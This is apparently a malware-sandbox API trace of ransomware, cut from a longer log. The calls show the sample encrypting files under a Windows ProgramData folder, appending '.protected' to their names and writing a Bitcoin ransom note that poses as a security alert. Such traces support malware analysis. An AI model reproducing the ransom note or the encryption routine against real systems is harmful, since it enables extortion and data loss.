cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\..") returned 35 [0071.014] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.014] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.014] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="Windows") returned -1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="Program Files") returned -1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="Program Files (x86)") returned -1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="$Recycle.bin") returned 1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="System Volume Information") returned -1 [0071.014] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound") returned 41 [0071.014] lstrcmpW (lpString1="Outbound", lpString2=".") returned 1 [0071.014] lstrcmpW (lpString1="Outbound", lpString2="..") returned 1 [0071.014] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*") returned 43 [0071.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.014] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.014] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.015] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\.") returned 43 [0071.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.015] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.015] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.015] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.015] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.015] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.015] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.015] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\..") returned 44 [0071.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.015] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.015] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.015] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt") returned 59 [0071.015] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\outbound\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.016] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.016] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.017] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.017] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.017] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.017] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.017] CloseHandle (hObject=0xb4) returned 1 [0071.017] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="Windows") returned -1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="Program Files") returned 1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="Program Files (x86)") returned 1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="$Recycle.bin") returned 1 [0071.017] lstrcmpiW (lpString1="PublishedData", lpString2="System Volume Information") returned -1 [0071.017] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData") returned 46 [0071.017] lstrcmpW (lpString1="PublishedData", lpString2=".") returned 1 [0071.017] lstrcmpW (lpString1="PublishedData", lpString2="..") returned 1 [0071.017] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*") returned 48 [0071.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.018] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.018] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.018] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.018] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.018] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.018] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\.") returned 48 [0071.018] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.018] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.018] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.018] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.018] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.018] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.018] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.018] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\..") returned 49 [0071.018] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.018] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.018] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.018] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="Windows") returned -1 [0071.019] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="Program Files") returned 1 [0071.019] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="Program Files (x86)") returned 1 [0071.019] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="$Recycle.bin") returned 1 [0071.019] lstrcmpiW (lpString1="RacWmiDatabase.sdf", lpString2="System Volume Information") returned -1 [0071.019] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned 65 [0071.019] StrStrIW (lpFirst="RacWmiDatabase.sdf", lpSrch=".protected") returned 0x0 [0071.019] lstrcmpW (lpString1="RacWmiDatabase.sdf", lpString2="RESTORE_FILES.txt") returned -1 [0071.019] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.019] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.019] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.019] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.019] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.020] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt") returned 64 [0071.020] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.036] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.036] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.036] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.036] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.036] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.036] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.036] CloseHandle (hObject=0xb4) returned 1 [0071.037] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="Windows") returned -1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="Program Files") returned 1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="Program Files (x86)") returned 1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="$Recycle.bin") returned 1 [0071.037] lstrcmpiW (lpString1="StateData", lpString2="System Volume Information") returned -1 [0071.037] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData") returned 42 [0071.037] lstrcmpW (lpString1="StateData", lpString2=".") returned 1 [0071.037] lstrcmpW (lpString1="StateData", lpString2="..") returned 1 [0071.037] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*") returned 44 [0071.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.037] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.037] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.037] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.037] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.037] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.037] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\.") returned 44 [0071.037] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.037] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.037] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.037] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.037] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.037] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.037] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.037] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\..") returned 45 [0071.037] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.037] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.038] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Windows") returned -1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Program Files") returned 1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="Program Files (x86)") returned 1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="$Recycle.bin") returned 1 [0071.038] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="System Volume Information") returned -1 [0071.038] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned 58 [0071.038] StrStrIW (lpFirst="RacDatabase.sdf", lpSrch=".protected") returned 0x0 [0071.038] lstrcmpW (lpString1="RacDatabase.sdf", lpString2="RESTORE_FILES.txt") returned -1 [0071.038] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.038] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.038] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Windows") returned -1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Program Files") returned 1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="Program Files (x86)") returned 1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="$Recycle.bin") returned 1 [0071.038] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="System Volume Information") returned -1 [0071.038] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat") returned 58 [0071.038] StrStrIW (lpFirst="RacMetaData.dat", lpSrch=".protected") returned 0x0 [0071.038] lstrcmpW (lpString1="RacMetaData.dat", lpString2="RESTORE_FILES.txt") returned -1 [0071.038] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.038] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.038] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.038] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="Windows") returned -1 [0071.038] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="Program Files") returned 1 [0071.038] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="Program Files (x86)") returned 1 [0071.038] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="$Recycle.bin") returned 1 [0071.039] lstrcmpiW (lpString1="RacWmiDataBookmarks.dat", lpString2="System Volume Information") returned -1 [0071.039] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0071.039] StrStrIW (lpFirst="RacWmiDataBookmarks.dat", lpSrch=".protected") returned 0x0 [0071.039] lstrcmpW (lpString1="RacWmiDataBookmarks.dat", lpString2="RESTORE_FILES.txt") returned -1 [0071.039] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.039] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.039] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0071.039] StrStrW (lpFirst="RacWmiDataBookmarks.dat", lpSrch=".txt") returned 0x0 [0071.039] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0071.039] StrStrW (lpFirst="RacWmiDataBookmarks.dat", lpSrch=".rar") returned 0x0 [0071.039] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0071.039] StrStrW (lpFirst="RacWmiDataBookmarks.dat", lpSrch=".zip") returned 0x0 [0071.039] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0071.040] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.040] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0071.040] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.040] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0071.040] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0071.040] CloseHandle (hObject=0xd4) returned 1 [0071.041] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.protected") returned 76 [0071.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.protected" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat.protected")) returned 1 [0071.042] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Windows") returned -1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Program Files") returned 1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="Program Files (x86)") returned 1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="$Recycle.bin") returned 1 [0071.042] lstrcmpiW (lpString1="RacWmiEventData.dat", lpString2="System Volume Information") returned -1 [0071.042] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat") returned 62 [0071.042] StrStrIW (lpFirst="RacWmiEventData.dat", lpSrch=".protected") returned 0x0 [0071.042] lstrcmpW (lpString1="RacWmiEventData.dat", lpString2="RESTORE_FILES.txt") returned -1 [0071.042] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.042] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.042] CreateFileW 